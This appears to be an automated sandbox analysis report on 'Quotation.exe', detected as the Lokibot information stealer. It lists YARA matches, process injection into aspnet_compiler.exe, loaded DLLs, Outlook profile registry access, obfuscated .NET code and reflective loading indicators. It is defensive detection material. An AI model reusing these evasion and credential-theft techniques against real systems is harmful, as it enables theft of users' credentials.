Source: 5.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 5.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 5.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 2.2.Quotation.exe.3699570.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 2.2.Quotation.exe.3699570.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 2.2.Quotation.exe.3699570.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.Quotation.exe.3699570.3.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.Quotation.exe.3699570.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 5.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 5.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000002.00000002.1343184318.000000000270A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000002.00000002.1343631435.0000000003699000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000002.00000002.1343631435.0000000003699000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000002.00000002.1343631435.0000000003699000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.1343184318.00000000027AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000002.00000002.1343184318.00000000027AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000002.00000002.1343184318.00000000027AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.1343631435.0000000003679000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000002.00000002.1343631435.0000000003679000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Quotation.exe PID: 4828, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: aspnet_compiler.exe PID: 1648, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: Quotation.exe, HOGoqysxqhRLlq5hak.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Quotation.exe, HOGoqysxqhRLlq5hak.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.Quotation.exe.4bc0000.4.raw.unpack, cb2e7c6ba8be0ef5b6ef7a92b800a3bbc.cs	Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
Source: 2.2.Quotation.exe.2789ca4.1.raw.unpack, cb2e7c6ba8be0ef5b6ef7a92b800a3bbc.cs	Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
Source: 2.2.Quotation.exe.2792428.2.raw.unpack, cb2e7c6ba8be0ef5b6ef7a92b800a3bbc.cs	Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/3@2/2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 5_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,

5_2_0040650A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 5_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

5_2_0040434D

Source: C:\Users\user\Desktop\Quotation.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Quotation.exe.log

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Users\user\Desktop\Quotation.exe	Mutant created: NULL

Source: Quotation.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Quotation.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Quotation.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Quotation.exe

ReversingLabs: Detection: 65%

Source: unknown	Process created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"
Source: C:\Users\user\Desktop\Quotation.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Users\user\Desktop\Quotation.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: Quotation.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Quotation.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Quotation.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\DEMONCODER.pdb source: Quotation.exe, 00000002.00000002.1343184318.0000000002788000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000002.00000002.1343737275.0000000004BC0000.00000004.08000000.00040000.00000000.sdmp, Quotation.exe, 00000002.00000002.1343184318.0000000002791000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\DEMONCODER.pdbBSJB source: Quotation.exe, 00000002.00000002.1343184318.0000000002788000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000002.00000002.1343737275.0000000004BC0000.00000004.08000000.00040000.00000000.sdmp, Quotation.exe, 00000002.00000002.1343184318.0000000002791000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Bish.pdb source: Quotation.exe
Source:	Binary string: aspnet_compiler.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000005.00000002.2553531481.0000000000C82000.00000002.00000001.01000000.00000009.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: Quotation.exe, HOGoqysxqhRLlq5hak.cs

.Net Code: Q5ixKlzmUhqm4nT07n(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),Q5ixKlzmUhqm4nT07n(typeof(Type).TypeHandle)})

.NET source code contains potential unpacker

Source: Quotation.exe, Hwj7F1W0yXV8nYP540.cs

.Net Code: nN0tcOuKE System.Reflection.Assembly.Load(byte[])

Yara detected aPLib compressed binary

Source: Yara match	File source: 2.2.Quotation.exe.3699570.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Quotation.exe.3699570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1343631435.0000000003699000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1343184318.00000000027AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1343631435.0000000003679000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation.exe PID: 4828, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 1648, type: MEMORYSTR

Source: Quotation.exe

Static PE information: 0x9B0F1489 [Sat Jun 8 10:52:57 2052 UTC]

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 5_2_00402AC0 push eax; ret		5_2_00402AD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 5_2_00402AC0 push eax; ret		5_2_00402AFC

Source: Quotation.exe, Form1.cs	High entropy of concatenated method names: 'Dispose', 'OH00Wm08N', 'LTB8dqSlgsYGTFPFVg', 'fUgMiHvxM5hfa7g9g1', 'VLA1dKICJ30INUFdUC', 'urmEQNGOWmseLbXmAm', 'AEMSiIYnmxvVtIbcjT', 'pVPOlxFHuTjTJgOtcA', 'Fmba050H2u6V6pnUMb', 'GyVObt6f7ldRfy3A3p'
Source: Quotation.exe, HOGoqysxqhRLlq5hak.cs	High entropy of concatenated method names: 'JakFagWm40sIPl4YrZy', 'NIP2SCW4hQHmRfmNbpK', 'LehYAmWcSPZUdb9Yej4', 'mMSYg2WTrYoFR9ZvRHl', 'tYUDhCvrKW', 'OBwjWcWxQlYm0XQa6yG', 'yqXJBJWlF8DtWOZEGo0', 'keVGTeWkI9QcttKGmRL', 'mtW1qtWC6qBmT2rRxo8', 'PgyKEkWJrumWEF0lmXA'
Source: Quotation.exe, Hwj7F1W0yXV8nYP540.cs	High entropy of concatenated method names: 'HwjW7F10y', 'VV8DnYP54', 'hZC7SHrMJ', 'bbv1YD6y4', 'nN0tcOuKE', 'Li6sLFrt0', 'kR9Q11kKh', 'cm2xQdcZC', 'fOAMA9qKcZx8DsXSl2', 'QZxtiZUVjDO2MZPxpK'

Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
